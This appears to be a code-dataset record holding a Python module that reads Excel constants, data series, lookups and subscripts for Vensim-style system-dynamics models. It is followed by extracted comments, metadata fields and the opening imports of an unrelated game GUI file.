Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function thar reads data from excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| """
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function thar reads series and data from excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
@staticmethod
def _reshape(data, dims):
"""
Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects if a series data (DATA/LOOKUPS), should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
Cell identificator, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be splitted means that the format is
# "A1" like then the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function thar reads data from excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| en | 0.685472 | These classes are a collection of the needed tools to read external data. The External type objects created by these classes are initialized before the Stateful objects by functions.Model.initialize. # TODO move to openpyxl Class to save the read Excel files and thus avoid double reading Read the Excel file or return the previously read one Read the Excel file using OpenPyXL or return the previously read one Clean the dictionary of read files Main class of external objects Attributes ---------- py_name: str The python name of the object missing: str ("warning", "error", "ignore", "keep") What to do with missing values. If "warning" (default) shows a warning message and interpolates the values. If "raise" raises an error. If "ignore" interpolates the values without showing anything. If "keep" it will keep the missing values, this option may cause the integration to fail, but it may be used to check the quality of the data. file: str File name from which the data is read. sheet: str Sheet name from which the data is read. Function to read data from excel file using rows and columns Parameters ---------- rows: list of len 2 first row and last row+1 to be read, starting from 0 cols: list of len 2 first col and last col+1 to be read, starting from 0 Returns ------- data: pandas.DataFrame, pandas.Series or float depending on the shape of the requested data # TODO move to openpyxl to avoid pandas dependency in this file. # read data # if it is a single row remove its dimension Function to read data from excel file using cell range name Parameters ---------- cellname: str the cell range name Returns ------- data: numpy.ndarray or float depending on the shape of the requested data # read data # Get the local id of the sheet # needed for searching in locals names # need to lower the sheetnames as Vensim has no case sensitivity # Error if it is not able to get the localSheetId # Search for local and global names # key error if the cellrange doesn't exist in the file or sheet Function thar reads series and data from excel file for DATA and LOOKUPS. Parameters ---------- series_across: "row", "column" or "name" The way to read series file. series_row_or_col: int or str If series_across is "row" the row number where the series data is. If series_across is "column" the column name where the series data is. If series_across is "name" the cell range name where the series data is. cell: If series_across is not "name, the top left cell where the data table starts. Else the name of the cell range where the data is. size: The size of the 2nd dimension of the data. Returns ------- series, data: ndarray (1D), ndarray(1D/2D) The values of the series and data. # Horizontal data (dimension values in a row) # get the dimension values # read data # Vertical data (dimension values in a column) # get the dimension values # read data # get series data # horizontal definition of lookup/time dimension # vertical definition of lookup/time dimension # Error if the lookup/time dimension is 2D # get data # transpose for horizontal definition of dimension # Given coordinates length is different than # the lentgh of 2nd dimension # remove second dimension of data if its shape is (N, 1) # raise FileNotFoundError(self.file) # python2 compatibility Initialize one element of DATA or LOOKUPS Parameters ---------- element_type: str "lookup" for LOOKUPS, "data" for data. Returns ------- data: xarray.DataArray Dataarray with the time or interpolation dimension as first dimension. # remove nan or missing values from dimension # Remove last nans only if the method is to read by row or col # series has len 0 # warning/error if missing data in the series # Check if the lookup/time dimension is strictly monotonous # Check for missing values in data # Fill missing values with the chosen interpolation method # what Vensim does during running for DATA # fill values Fills missing values in excel read data. Mutates the values in data. Parameters ---------- series: the time series without missing values data: the data with missing values Returns ------- None # if data is 2dims we need to interpolate Interpolates a list of missing values from _fill_missing Parameters ---------- x: list of missing values interpolate xr: non-missing x values yr: non-missing y values Returns ------- y: Result after interpolating x with self.interp method Returns file and sheet name in a string Transforms the column name to int Parameters ---------- col: str Column name Returns ------- int Column number Splits a cell value given in a string. Returns None for non-valid cell formats. Parameters ---------- cell: str Cell like string, such as "A1", "b16", "AC19"... If it is not a cell like string will return None. Returns ------- row number, column number: int, int If the cell input is valid. Both numbers are given in Python enumeration, i.e., first row and first column are 0. # check that we only have two values [column, row] # check that the column name has no special characters # check that row number is not 0 # the column name has as maximum 3 letters Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray or np.ndarray in the given dimensions. Parameters ---------- data: xarray.DataArray/numpy.ndarray Data to be reshaped dims: tuple The dimensions to reshape. Returns ------- numpy.ndarray reshaped array Selects if a series data (DATA/LOOKUPS), should be read by columns, rows or cellrange name. Based on the input format of x_row_or_col and cell. The format of the 2 variables must be consistent. Parameters ---------- x_row_or_col: str String of a number if series is given in a row, letter if series is given in a column or name if the series is given by cellrange name. cell: str Cell identificator, such as "A1", or name if the data is given by cellrange name. Returns ------- series_across: str "row" if series is given in a row "column" if series is given in a column "name" if series and data are given by range name # if x_row_or_col is numeric the series must be a row # if the cell can be splitted means that the format is # "A1" like then the series must be a column Class for Vensim GET XLS DATA/GET DIRECT DATA # check if the interpolation method is valid Add information to retrieve new dimension in an already declared object Initialize all elements and create the self.data xarray.DataArray # Remove time coord from the DataArray # if data has no-coords return a float Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS Add information to retrieve new dimension in an already declared object Initialize all elements and create the self.data xarray.DataArray # shape 0 xarrays # the output will be always an xarray # the output could be a float or an xarray # Remove lookup dimension coord from the DataArray # if lookup has no-coords return a float Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS Add information to retrieve new dimension in an already declared object Initialize all elements and create the self.data xarray.DataArray Initialize one element # nan values in data # Create only an xarray if the data is not 0 dimensional Function thar reads data from excel file for CONSTANT Parameters ---------- data_across: "cell" or "name" The way to read data file. cell: int or str If data_across is "cell" the lefttop split cell value where the data is. If data_across is "name" the cell range name where the data is. shape: The shape of the data in 2D. Returns ------- data: float/ndarray(1D/2D) The values of the data. # read data from topleft cell name using pandas # read data from cell range name using OpenPyXL # Remove length=1 axis # Data is a float, nothing to do # Check data dims Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT | 3.314808 | 3 |
pirates/piratesgui/ChatBar.py | ksmit799/POTCO-PS | 8 | 9171 | # File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
